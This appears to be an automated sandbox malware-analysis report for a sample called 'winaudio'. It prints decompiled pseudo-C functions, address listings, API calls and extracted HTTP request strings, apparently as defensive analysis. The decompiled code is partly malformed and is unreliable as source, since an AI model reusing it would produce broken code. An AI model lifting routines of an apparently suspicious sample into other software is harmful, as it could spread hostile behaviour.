						_t187 = E002D1600( *((intOrPtr*)(_t266 + 0x14)),  >=  ? _v48 :  &_v48, _v32);
						_t351 = _t355 + 4;
						__eflags = _t187;
						if(_t187 != 0) {
							_v8 = 1;
							_t188 = _v100;
							__eflags = _t188 - 0x10;
							if(_t188 >= 0x10) {
								_t285 = _v120;
								__eflags = _t188 + 1 - 0x1000;
								if(_t188 + 1 >= 0x1000) {
									__eflags = _t285 & 0x0000001f;
									if(__eflags != 0) {
										E0037F981(_t266, _t285, _t343, __eflags);
									}
									_t197 =  *(_t285 - 4);
									__eflags = _t197 - _t285;
									if(__eflags >= 0) {
										_t197 = E0037F981(_t266, _t285, _t343, __eflags);
									}
									_t286 = _t285 - _t197;
									__eflags = _t286 - 4;
									if(__eflags < 0) {
										_t197 = E0037F981(_t266, _t286, _t343, __eflags);
									}
									__eflags = _t286 - 0x23;
									if(__eflags > 0) {
										_t197 = E0037F981(_t266, _t286, _t343, __eflags);
									}
									_t285 = _t197;
								}
								L002E05B1(_t285);
								_t351 = _t351 + 4;
							}
							_v8 = 0;
							_t189 = _v28;
							_v100 = 0xf;
							_v104 = 0;
							_v120 = 0;
							__eflags = _t189 - 0x10;
							if(_t189 < 0x10) {
								goto L16;
							} else {
								_t283 = _v48;
								__eflags = _t189 + 1 - 0x1000;
								if(_t189 + 1 < 0x1000) {
									goto L15;
								} else {
									__eflags = _t283 & 0x0000001f;
									if(__eflags == 0) {
										goto L8;
									} else {
										E0037F981(_t266, _t283, _t343, __eflags);
										return 0x2d598b;
									}
								}
							}
						} else {
							E002D0420(_t266,  &_v120, _t343);
							goto L138;
						}
					} else {
						_t343 = _t343 + 1;
						if(_t343 > 0x32) {
							L138:
							E002D0420(_t266,  &_v48, _t343);
							break;
						} else {
							Sleep(0x64);
							_v8 = 0;
							_t262 = _v28;
							if(_t262 >= 0x10) {
								_t283 = _v48;
								if(_t262 + 1 >= 0x1000) {
									_t379 = _t283 & 0x0000001f;
									if((_t283 & 0x0000001f) != 0) {
										E0037F981(_t266, _t283, _t343, _t379);
									}
									L8:
									_t192 =  *(_t283 - 4);
									_t380 = _t192 - _t283;
									if(_t192 >= _t283) {
										_t192 = E0037F981(_t266, _t283, _t343, _t380);
									}
									_t284 = _t283 - _t192;
									_t381 = _t284 - 4;
									if(_t284 < 4) {
										_t192 = E0037F981(_t266, _t284, _t343, _t381);
									}
									_t382 = _t284 - 0x23;
									if(_t284 > 0x23) {
										_t192 = E0037F981(_t266, _t284, _t343, _t382);
									}
									_t283 = _t192;
								}
								L15:
								L002E05B1(_t283);
								_t351 = _t351 + 4;
							}
							L16:
							_v8 = 0xffffffff;
							continue;
						}
					}
					L156:
				}
				_t167 =  *0x3ebb0c; // 0x6556
				_t168 = _t167 + 2;
				__eflags = _t168 - 0x1490;
				_t169 =  >  ? 0 : _t168;
				 *0x3ebb0c = _t169;
				 *0x3f0830 = _t169 & 0x00000019 | 0x000000e0;
				E002D16F0( *((intOrPtr*)(_t266 + 0x10)), _t328);
				 *[fs:0x0] = _v16;
				_pop(_t346);
				__eflags = _v24 ^ _t348;
				return E002E056D(_v24 ^ _t348, _t328, _t346);
				goto L156;
			}






































































































































                        0x002d5211
                        0x002d5213
                        0x002d5215
                        0x002d5220
                        0x002d5221
                        0x002d5227
                        0x002d522c
                        0x002d522e
                        0x002d5231
                        0x002d5232
                        0x002d5233
                        0x002d5234
                        0x002d5238
                        0x002d523e
                        0x002d5241
                        0x002d5243
                        0x002d5249
                        0x002d5250
                        0x002d525a
                        0x002d5264
                        0x002d5267
                        0x002d526c
                        0x002d5272
                        0x002d527f
                        0x002d5282
                        0x002d528f
                        0x002d5297
                        0x002d5305
                        0x002d5308
                        0x002d530a
                        0x002d5310
                        0x002d5317
                        0x002d531a
                        0x002d531e
                        0x002d5324
                        0x002d5320
                        0x002d5320
                        0x002d5320
                        0x002d5326
                        0x002d5328
                        0x002d532e
                        0x002d5334
                        0x002d5339
                        0x002d5340
                        0x002d5340
                        0x002d5342
                        0x002d5343
                        0x002d5343
                        0x002d5347
                        0x002d5347
                        0x002d5330
                        0x002d5330
                        0x002d5330
                        0x002d5349
                        0x002d5351
                        0x002d5356
                        0x002d5359
                        0x002d535d
                        0x002d535f
                        0x002d5366
                        0x002d536d
                        0x002d5371
                        0x002d5377
                        0x002d5373
                        0x002d5373
                        0x002d5373
                        0x002d5379
                        0x002d537b
                        0x002d5381
                        0x002d5384
                        0x002d538c
                        0x002d5390
                        0x002d5395
                        0x002d5398
                        0x002d539c
                        0x002d53a0
                        0x002d53a6
                        0x002d53a9
                        0x002d53ab
                        0x002d53b2
                        0x002d53b9
                        0x002d53bd
                        0x002d53c3
                        0x002d53bf
                        0x002d53bf
                        0x002d53bf
                        0x002d53c5
                        0x002d53c7
                        0x002d53cd
                        0x002d53d0
                        0x002d53db
                        0x002d53e3
                        0x002d53ea
                        0x002d53f1
                        0x002d53f5
                        0x002d53fc
                        0x002d5403
                        0x002d540a
                        0x002d5414
                        0x002d5419
                        0x002d5420
                        0x002d5423
                        0x002d5428
                        0x002d542b
                        0x002d542e
                        0x002d5430
                        0x002d5438
                        0x002d5443
                        0x002d5448
                        0x002d544f
                        0x002d5456
                        0x002d545a
                        0x002d5460
                        0x002d545c
                        0x002d545c
                        0x002d545c
                        0x002d5462
                        0x002d5464
                        0x002d546d
                        0x002d5470
                        0x002d5475
                        0x002d5478
                        0x002d547c
                        0x002d547e
                        0x002d5485
                        0x002d548c
                        0x002d5490
                        0x002d5496
                        0x002d5492
                        0x002d5492
                        0x002d5492
                        0x002d5498
                        0x002d549b
                        0x002d54a2
                        0x002d54a8
                        0x002d54ad
                        0x002d54b0
                        0x002d54b0
                        0x002d54b2
                        0x002d54b3
                        0x002d54b3
                        0x002d54b7
                        0x002d54b7
                        0x002d54a4
                        0x002d54a4
                        0x002d54a4
                        0x002d54b9
                        0x002d54c1
                        0x002d54c9
                        0x002d54cd
                        0x002d54d5
                        0x002d54d8
                        0x002d54da
                        0x002d54e0
                        0x002d54e7
                        0x002d54ee
                        0x002d54f2
                        0x002d54f8
                        0x002d54f4
                        0x002d54f4
                        0x002d54f4
                        0x002d54fa
                        0x002d54fc
                        0x002d5502
                        0x002d5505
                        0x002d550a
                        0x002d550d
                        0x002d5511
                        0x002d5513
                        0x002d5519
                        0x002d5520
                        0x002d5527
                        0x002d552b
                        0x002d5531
                        0x002d552d
                        0x002d552d
                        0x002d552d
                        0x002d5533
                        0x002d5536
                        0x002d553d
                        0x002d5543
                        0x002d5548
                        0x002d5550
                        0x002d5550
                        0x002d5552
                        0x002d5553
                        0x002d5553
                        0x002d5557
                        0x002d5557
                        0x002d553f
                        0x002d553f
                        0x002d553f
                        0x002d5559
                        0x002d5561
                        0x002d5566
                        0x002d5569
                        0x002d556d
                        0x002d556f
                        0x002d5576
                        0x002d557d
                        0x002d5581
                        0x002d5587
                        0x002d5583
                        0x002d5583
                        0x002d5583
                        0x002d5589
                        0x002d558c
                        0x002d5593
                        0x002d5599
                        0x002d559e
                        0x002d55a1
                        0x002d55a1
                        0x002d55a3
                        0x002d55a4
                        0x002d55a4
                        0x002d55a8
                        0x002d55a8
                        0x002d5595
                        0x002d5595
                        0x002d5595
                        0x002d55aa
                        0x002d55b2
                        0x002d55ba
                        0x002d55c1
                        0x002d55c6
                        0x002d55c9
                        0x002d55cb
                        0x002d55d1
                        0x002d55d4
                        0x002d55d6
                        0x002d55dc
                        0x002d55e3
                        0x002d55ea
                        0x002d55ee
                        0x002d55f4
                        0x002d55f0
                        0x002d55f0
                        0x002d55f0
                        0x002d55f6
                        0x002d55f8
                        0x002d55fe
                        0x002d5601
                        0x002d5606
                        0x002d5609
                        0x002d560d
                        0x002d560f
                        0x002d5615
                        0x002d561c
                        0x002d5623
                        0x002d5627
                        0x002d562d
                        0x002d5629
                        0x002d5629
                        0x002d5629
                        0x002d562f
                        0x002d5632
                        0x002d5639
                        0x002d563f
                        0x002d5644
                        0x002d5647
                        0x002d5647
                        0x002d5649
                        0x002d564a
                        0x002d564a
                        0x002d564e
                        0x002d564e
                        0x002d563b
                        0x002d563b
                        0x002d563b
                        0x002d5650
                        0x002d5658
                        0x002d565d
                        0x002d5660
                        0x002d5664
                        0x002d5666
                        0x002d566d
                        0x002d5674
                        0x002d5678
                        0x002d567e
                        0x002d567a
                        0x002d567a
                        0x002d567a
                        0x002d5680
                        0x002d5683
                        0x002d568a
                        0x002d5690
                        0x002d5695
                        0x002d5698
                        0x002d5698
                        0x002d569a
                        0x002d569b
                        0x002d569b
                        0x002d569f
                        0x002d569f
                        0x002d568c
                        0x002d568c
                        0x002d568c
                        0x002d56a1
                        0x002d56a9
                        0x002d56b1
                        0x002d56b8
                        0x002d56bd
                        0x002d56bd
                        0x002d56c0
                        0x002d56c8
                        0x002d56d2
                        0x002d56da
                        0x002d56dd
                        0x002d56e1
                        0x002d56e3
                        0x002d56e9
                        0x002d56f0
                        0x002d56f7
                        0x002d56fb
                        0x002d5701
                        0x002d56fd
                        0x002d56fd
                        0x002d56fd
                        0x002d5703
                        0x002d5706
                        0x002d570d
                        0x002d5713
                        0x002d5718
                        0x002d5720
                        0x002d5720
                        0x002d5722
                        0x002d5723
                        0x002d5723
                        0x002d5727
                        0x002d5727
                        0x002d570f
                        0x002d570f
                        0x002d570f
                        0x002d5729
                        0x002d5731
                        0x002d5736
                        0x002d5739
                        0x002d573d
                        0x002d573f
                        0x002d5746
                        0x002d574d
                        0x002d5751
                        0x002d5757
                        0x002d5753
                        0x002d5753
                        0x002d5753
                        0x002d5759
                        0x002d575c
                        0x002d5763
                        0x002d5769
                        0x002d576e
                        0x002d5771
                        0x002d5771
                        0x002d5773
                        0x002d5774
                        0x002d5774
                        0x002d5778
                        0x002d5778
                        0x002d5765
                        0x002d5765
                        0x002d5765
                        0x002d577a
                        0x002d5782
                        0x002d578a
                        0x002d578e
                        0x002d5793
                        0x002d5797
                        0x002d579a
                        0x002d579d
                        0x002d57a0
                        0x002d57a2
                        0x002d57a6
                        0x002d57ab
                        0x002d57ad
                        0x002d57b0
                        0x002d57b2
                        0x002d57b2
                        0x002d57b7
                        0x002d57ba
                        0x002d57bc
                        0x002d57be
                        0x002d57be
                        0x002d57c3
                        0x002d57c5
                        0x002d57c8
                        0x002d57ca
                        0x002d57ca
                        0x002d57cf
                        0x002d57d2
                        0x002d57d4
                        0x002d57d4
                        0x002d57d9
                        0x002d57d9
                        0x002d57dc
                        0x002d57e1
                        0x002d57e1
                        0x002d57e4
                        0x002d57e8
                        0x002d57eb
                        0x002d57f2
                        0x002d57f9
                        0x002d57fd
                        0x002d5800
                        0x002d5802
                        0x002d5806
                        0x002d580b
                        0x002d580d
                        0x002d5810
                        0x002d5812
                        0x002d5812
                        0x002d5817
                        0x002d581a
                        0x002d581c
                        0x002d581e
                        0x002d581e
                        0x002d5823
                        0x002d5825
                        0x002d5828
                        0x002d582a
                        0x002d582a
                        0x002d582f
                        0x002d5832
                        0x002d5834
                        0x002d5834
                        0x002d5839
                        0x002d5839
                        0x002d583c
                        0x002d5841
                        0x002d5841
                        0x002d5844
                        0x002d5848
                        0x002d584b
                        0x002d5852
                        0x002d5859
                        0x002d585d
                        0x002d5860
                        0x002d5862
                        0x002d5869
                        0x002d586e
                        0x002d5870
                        0x002d5873
                        0x002d5875
                        0x002d5875
                        0x002d587a
                        0x002d587d
                        0x002d587f
                        0x002d5881
                        0x002d5881
                        0x002d5886
                        0x002d5888
                        0x002d588b
                        0x002d588d
                        0x002d588d
                        0x002d5892
                        0x002d5895
                        0x002d5897
                        0x002d5897
                        0x002d589c
                        0x002d589c
                        0x002d589f
                        0x002d58a4
                        0x002d58a4
                        0x002d58a7
                        0x002d58ae
                        0x002d58b5
                        0x002d58b5
                        0x002d58bc
                        0x002d58c6
                        0x002d58cd
                        0x002d58d7
                        0x002d58dc
                        0x002d58df
                        0x002d58e1
                        0x002d58f8
                        0x002d58fc
                        0x002d58ff
                        0x002d5902
                        0x002d5904
                        0x002d5908
                        0x002d590d
                        0x002d590f
                        0x002d5912
                        0x002d5914
                        0x002d5914
                        0x002d5919
                        0x002d591c
                        0x002d591e
                        0x002d5920
                        0x002d5920
                        0x002d5925
                        0x002d5927
                        0x002d592a
                        0x002d592c
                        0x002d592c
                        0x002d5931
                        0x002d5934
                        0x002d5936
                        0x002d5936
                        0x002d593b
                        0x002d593b
                        0x002d593e
                        0x002d5943
                        0x002d5943
                        0x002d5946
                        0x002d594a
                        0x002d594d
                        0x002d5954
                        0x002d595b
                        0x002d595f
                        0x002d5962
                        0x00000000
                        0x002d5968
                        0x002d5968
                        0x002d596c
                        0x002d5971
                        0x00000000
                        0x002d5977
                        0x002d5977
                        0x002d597a
                        0x00000000
                        0x002d5980
                        0x002d5980
                        0x002d598a
                        0x002d598a
                        0x002d597a
                        0x002d5971
                        0x002d58e3
                        0x002d58e6
                        0x00000000
                        0x002d58e6
                        0x002d5299
                        0x002d5299
                        0x002d529d
                        0x002d58eb
                        0x002d58ee
                        0x00000000
                        0x002d52a3
                        0x002d52a5
                        0x002d52ab
                        0x002d52af
                        0x002d52b5
                        0x002d52b7
                        0x002d52c0
                        0x002d52c2
                        0x002d52c5
                        0x002d52c7
                        0x002d52c7
                        0x002d52cc
                        0x002d52cc
                        0x002d52cf
                        0x002d52d1
                        0x002d52d3
                        0x002d52d3
                        0x002d52d8
                        0x002d52da
                        0x002d52dd
                        0x002d52df
                        0x002d52df
                        0x002d52e4
                        0x002d52e7
                        0x002d52e9
                        0x002d52e9
                        0x002d52ee
                        0x002d52ee
                        0x002d52f0
                        0x002d52f1
                        0x002d52f6
                        0x002d52f6
                        0x002d52f9
                        0x002d52f9
                        0x00000000
                        0x002d52f9
                        0x002d529d
                        0x00000000
                        0x002d5297
                        0x002d5991
                        0x002d5998
                        0x002d599b
                        0x002d59a0
                        0x002d59a6
                        0x002d59b3
                        0x002d59b8
                        0x002d59c0
                        0x002d59c9
                        0x002d59ce
                        0x002d59d8
                        0x00000000

                        APIs
                        • Sleep.KERNEL32(00000064,847B54EE), ref: 002D52A5
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: Sleep
                        • String ID: HTTP$GET $Host$POST $Referer
                        • API String ID: 3472027048-3468625898
                        • Opcode ID: 32eb547c746e8e4e33d0b74e89e6c5cc47770722f92e48abd51dfa790a83c903
                        • Instruction ID: 5869aea092cb8fdd203c706b656c80dd053c6c0102e8964cb3f2473cf545eb59
                        • Opcode Fuzzy Hash: 32eb547c746e8e4e33d0b74e89e6c5cc47770722f92e48abd51dfa790a83c903
                        • Instruction Fuzzy Hash: 11323470A24291CFEF1AEF78C4493ADBBA5AB02304F60419ED4469B3C3C7B59D95CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002B1000 Relevance: 7.6, Strings: 6, Instructions: 129COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID:
                        • String ID: Auth$Genu$cAMD$enti$ineI$ntel
                        • API String ID: 0-1714976780
                        • Opcode ID: c77623a033a8abfacda9f66ad4af76de5be2dd884c722bfa4f30fc1e450f6a10
                        • Instruction ID: ef1fd89e1765660625da14e95a913140ea7e3359e7a2e55d7658a4c02c4c0fe1
                        • Opcode Fuzzy Hash: c77623a033a8abfacda9f66ad4af76de5be2dd884c722bfa4f30fc1e450f6a10
                        • Instruction Fuzzy Hash: AF312877E345570BEB289C6C98A43E9308393513B0F6ACB39DA2AD76C4E4698CB04290
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002DE5D0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 95COMMON
                        Download Yara Rule
                        C-Code - Quality: 63%
                        			E002DE5D0(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi) {
				intOrPtr _v8;
				char _v16;
				signed int _v20;
				char _v276;
				intOrPtr _v280;
				char _v284;
				char _v300;
				struct _OSVERSIONINFOW _v576;
				intOrPtr _v580;
				char _v584;
				void* __esi;
				void* __ebp;
				signed int _t33;
				signed int _t34;
				signed int _t48;
				intOrPtr _t53;
				intOrPtr _t65;
				intOrPtr* _t66;
				void* _t67;
				void* _t69;
				intOrPtr _t72;
				void* _t73;
				signed int _t74;

				_t70 = __edi;
				_t69 = __edx;
				_t56 = __ebx;
				_push(0xffffffff);
				_push(0x39cd6b);
				_push( *[fs:0x0]);
				_t33 =  *0x3e1008; // 0x847b54ee
				_t34 = _t33 ^ _t74;
				_v20 = _t34;
				_push(_t34);
				 *[fs:0x0] =  &_v16;
				_t72 = __ecx;
				_v580 = __ecx;
				_v584 = 0;
				E0037E1A0(__edi,  &_v576, 0, 0x114);
				_v280 = 0xf;
				_v284 = 0;
				_v300 = 0;
				_push(1);
				E002D0860(__ebx,  &_v300, 0x3dd5c0);
				_v8 = 0;
				E0037E1A0(_t70,  &_v276, 0, 0xff);
				_v576.dwOSVersionInfoSize = 0x114;
				if(GetVersionExW( &_v576) != 0) {
					_t48 = _v576.dwMajorVersion;
					_t65 = _v576.dwMinorVersion;
					if(_t48 >= 6 && _t65 >= 2) {
						_t48 = 0xa;
						_t65 = 0;
						_v576.dwMajorVersion = 0xa;
						_v576.dwMinorVersion = 0;
					}
					 *0x3f0830 = 0x7ff7;
					_push(_t65 + (_t48 + _t48 * 4) * 2);
					wsprintfA( &_v276, "%ld");
					if(_v276 != 0) {
						_t66 =  &_v276;
						_t25 = _t66 + 1; // 0x1
						_t69 = _t25;
						do {
							_t53 =  *_t66;
							_t66 = _t66 + 1;
						} while (_t53 != 0);
						_t67 = _t66 - _t69;
					} else {
						_t67 = 0;
					}
					_push(_t67);
					E002D0860(_t56,  &_v300,  &_v276);
				}
				E002D0540(_t72,  &_v300);
				E002D0420(_t56,  &_v300, _t70);
				 *[fs:0x0] = _v16;
				_pop(_t73);
				_t31 =  &_v20; // 0x2de827
				return E002E056D( *_t31 ^ _t74, _t69, _t73);
			}


























                        0x002de5d0
                        0x002de5d0
                        0x002de5d0
                        0x002de5d3
                        0x002de5d5
                        0x002de5e0
                        0x002de5e7
                        0x002de5ec
                        0x002de5ee
                        0x002de5f2
                        0x002de5f6
                        0x002de5fc
                        0x002de5fe
                        0x002de60f
                        0x002de61c
                        0x002de624
                        0x002de634
                        0x002de63e
                        0x002de645
                        0x002de64c
                        0x002de65c
                        0x002de666
                        0x002de66e
                        0x002de687
                        0x002de68d
                        0x002de693
                        0x002de69c
                        0x002de6a3
                        0x002de6a8
                        0x002de6aa
                        0x002de6b0
                        0x002de6b0
                        0x002de6b9
                        0x002de6c6
                        0x002de6d3
                        0x002de6e3
                        0x002de6e9
                        0x002de6ef
                        0x002de6ef
                        0x002de6f2
                        0x002de6f2
                        0x002de6f4
                        0x002de6f5
                        0x002de6f9
                        0x002de6e5
                        0x002de6e5
                        0x002de6e5
                        0x002de6fb
                        0x002de709
                        0x002de709
                        0x002de717
                        0x002de722
                        0x002de72c
                        0x002de734
                        0x002de735
                        0x002de742

                        APIs
                        • GetVersionExW.KERNEL32(00000114,?,003DD5C0,00000001,?,847B54EE), ref: 002DE67F
                        • wsprintfA.USER32 ref: 002DE6D3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: Versionwsprintf
                        • String ID: %ld$'-
                        • API String ID: 2108043187-1839521463
                        • Opcode ID: 8128308aedebd606c34863c6832440743c1a1b415d5a5a2dec89f2ec6335c998
                        • Instruction ID: ba7e94e58cf01362980a76fdc7dc746238690faabbfe22839628728bd750403c
                        • Opcode Fuzzy Hash: 8128308aedebd606c34863c6832440743c1a1b415d5a5a2dec89f2ec6335c998
                        • Instruction Fuzzy Hash: 13419270D102189BDF25EF14DC8ABE9B7B8EB08714F4001EAE509A7281DB745B94CF90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00372580 Relevance: 5.7, Strings: 4, Instructions: 662COMMONCrypto
                        Download Yara Rule
                        C-Code - Quality: 58%
                        			E00372580(void* __ebx, void* __ecx, signed int __edx, void* __edi, intOrPtr* _a4, signed int _a7, intOrPtr _a8, signed int* _a12, signed int _a16, intOrPtr _a20, signed int _a23, signed int _a24, unsigned int _a28, intOrPtr _a32, intOrPtr _a36, signed int _a40, signed int _a44, signed int _a48, signed int _a52, signed char _a56, intOrPtr _a60, signed int _a64, signed int _a68, signed int _a72, intOrPtr _a76, intOrPtr* _a80, signed int _a84, signed int _a88, intOrPtr _a92, intOrPtr _a96, intOrPtr _a100, unsigned int _a104, intOrPtr _a108, signed int _a112, char _a116, char _a120, char _a160, char _a376, char _a392, char _a456, char _a584, intOrPtr _a592, char _a596, char _a597, char _a712, signed int _a844) {
				void* __esi;
				void* __ebp;
				signed int _t262;
				void* _t270;
				signed int _t271;
				signed int _t273;
				intOrPtr _t276;
				signed int _t282;
				signed char _t286;
				signed int _t288;
				signed int _t296;
				intOrPtr _t300;
				void* _t305;
				void* _t308;
				signed int _t310;
				signed int _t312;
				char* _t323;
				char* _t325;
				char* _t327;
				signed int _t328;
				signed int _t352;
				void* _t360;
				signed int _t374;
				signed int _t375;
				intOrPtr _t378;
				signed int _t394;
				void* _t396;
				intOrPtr _t411;
				void* _t414;
				signed int _t419;
				signed int _t422;
				signed int _t424;
				signed int _t427;
				signed int _t432;
				signed int _t434;
				void* _t436;
				signed int _t439;
				signed char _t447;
				signed char _t458;
				signed int _t464;
				signed int _t468;
				unsigned int _t472;
				signed int _t473;
				signed int _t474;
				signed char _t480;
				unsigned int _t483;
				unsigned int _t492;
				signed int _t497;
				signed int _t499;
				unsigned int _t500;
				signed int _t504;
				unsigned int _t521;
				intOrPtr _t522;
				signed char _t525;
				signed int _t531;
				signed int _t533;
				signed int _t535;
				void* _t536;
				signed int _t540;
				void* _t541;
				void* _t543;
				signed int _t544;
				signed int _t545;
				void* _t546;
				unsigned int _t548;
				signed int _t551;
				void* _t554;
				void* _t555;
				void* _t556;
				signed int _t557;
				signed int _t558;
				void* _t559;
				signed int _t560;
				void* _t561;
				void* _t562;
				void* _t563;
				void* _t565;
				void* _t566;
				void* _t568;
				signed int _t575;

				_t503 = __edx;
				_t461 = __ecx;
				_t558 = _t557 & 0xfffffff0;
				E00397C10();
				_t262 =  *0x3e1008; // 0x847b54ee
				_a844 = _t262 ^ _t558;
				_t567 = _a28 - 0x100000;
				_a80 = _a4;
				_a108 = _a8;
				_t439 = 0x40;
				_t540 = _a12;
				_a44 = _a16;
				_a36 = _a20;
				_t531 = 8;
				_a112 = _t540;
				_a76 = _a32;
				_a64 = 0x40;
				_a72 = 0x28;
				_a16 = 8;
				_a7 = 1;
				if(_a28 >= 0x100000) {
					E002ED3C0(0x40, __ecx, __edx, 8, _t556, _t567, ".\\ssl\\s3_cbc.c", 0x1c7, "data_plus_mac_plus_padding_size < 1024 * 1024");
					_t558 = _t558 + 0xc;
				}
				_t270 = E002F2F10(E002F3360(_a80));
				_t559 = _t558 + 8;
				_t568 = _t270 - 0x2a0;
				if(_t568 > 0) {
					_t271 = _t270 - 0x2a1;
					__eflags = _t271;
					if(_t271 == 0) {
						_t273 = E002FB080( &_a160);
						_t560 = _t559 + 4;
						__eflags = _t273;
						if(_t273 <= 0) {
							goto L76;
						} else {
							_t464 = 0x30;
							goto L23;
						}
					} else {
						_t422 = _t271 - 1;
						__eflags = _t422;
						if(_t422 == 0) {
							_t424 = E002FB6B0( &_a160);
							_t560 = _t559 + 4;
							__eflags = _t424;
							if(_t424 <= 0) {
								goto L76;
							} else {
								_t464 = _t439;
								L23:
								_t531 = 0x10;
								_a8 = 0x2fb760;
								_t439 = 0x80;
								_a16 = 0x10;
								_a64 = 0x80;
								_a32 = 0x373330;
								goto L24;
							}
						} else {
							__eflags = _t422 - 1;
							if(__eflags == 0) {
								_t427 = E002FABE0( &_a160);
								_t560 = _t559 + 4;
								__eflags = _t427;
								if(_t427 <= 0) {
									goto L76;
								} else {
									_a32 = 0x373240;
									_t464 = 0x1c;
									_a8 = 0x2faf80;
									goto L24;
								}
							} else {
								goto L15;
							}
						}
					}
				} else {
					if(_t568 == 0) {
						_t432 = E002FAF20( &_a160);
						_t560 = _t559 + 4;
						__eflags = _t432;
						if(_t432 <= 0) {
							goto L76;
						} else {
							_a32 = 0x373240;
							_t464 = 0x20;
							_a8 = 0x2faf80;
							goto L24;
						}
					} else {
						if(_t270 == 4) {
							_t434 = E00338F70( &_a160);
							_t560 = _t559 + 4;
							__eflags = _t434;
							if(_t434 <= 0) {
								goto L76;
							} else {
								_t504 = 0x30;
								_a32 = 0x373120;
								_a8 = 0x30a7f0;
								_t464 = 0x10;
								_a72 = 0x30;
								_a7 = 0;
								goto L25;
							}
						} else {
							if(_t270 != 0x40) {
								L15:
								E002ED3C0(_t439, _t461, _t503, _t531, _t556, __eflags, ".\\ssl\\s3_cbc.c", 0x209, 0x3dd5c0);
								_t560 = _t559 + 0xc;
								__eflags = _t540;
								if(_t540 == 0) {
									goto L76;
								} else {
									 *_t540 = 0;
									_pop(_t555);
									__eflags = _a844 ^ _t560;
									return E002E056D(_a844 ^ _t560, _t503, _t555);
								}
							} else {
								_t436 = E002FAAA0( &_a160);
								_t560 = _t559 + 4;
								if(_t436 <= 0) {
									L76:
									_pop(_t541);
									return E002E056D(_a844 ^ _t560, _t503, _t541);
								} else {
									_a32 = 0x3731a0;
									_t464 = 0x14;
									_a8 = 0x2faae0;
									L24:
									_t504 = 0x28;
									L25:
									_t276 = 0xd;
									_a24 = _t464;
									_a60 = 0xd;
									if(_a40 != 0) {
										_t276 = _a36 + 0xb + _t504;
										_a60 = _t276;
									}
									_t543 = _t276 - _t464;
									_a40 = 2 + (0 | _a40 == 0x00000000) * 4;
									_t533 = 0;
									_t468 = _a24 + _t543;
									_a56 = (_t543 + _t531 + _t439 + _a28 - 1) / _t439;
									_t544 = _a16;
									_a48 = 0;
									_t282 = _t468;
									_a52 = _t468;
									_a68 = _t282 % _t439;
									_a84 = _t282 / _t439;
									_t503 = _a40;
									_t575 = _a40;
									_a88 = (_t468 + _t544) / _t439;
									_t286 = _a56;
									_t471 = (_t575 != 0) + _t503;
									_a28 = 0;
									if(_t286 > (_t575 != 0) + _t503) {
										_t419 = _t286 - _t503;
										_a48 = _t419;
										_t533 = _t419 * _t439;
										_a28 = _t533;
									}
									_t288 = _a52 << 3;
									_a12 = _t288;
									if(_a40 == 0) {
										_a12 = _t288 + _t439 * 8;
										E0037E1A0(_t533,  &_a456, 0, _t439);
										_t411 = _a36;
										_t565 = _t560 + 0xc;
										_t579 = _t411 - 0x80;
										if(_t411 > 0x80) {
											E002ED3C0(_t439, _t471, _t503, _t533, _t556, _t579, ".\\ssl\\s3_cbc.c", 0x271, "mac_secret_length <= sizeof(hmac_pad)");
											_t411 = _a36;
											_t565 = _t565 + 0xc;
										}
										E0037E340( &_a456, _a76, _t411);
										asm("movaps xmm1, [0x3b9380]");
										_t566 = _t565 + 0xc;
										_t414 = 0;
										do {
											asm("movups xmm0, [esp+eax+0x1d8]");
											asm("pxor xmm0, xmm1");
											asm("movups [esp+eax+0x1d8], xmm0");
											asm("movups xmm0, [esp+eax+0x1e8]");
											asm("pxor xmm0, xmm1");
											asm("movups [esp+eax+0x1e8], xmm0");
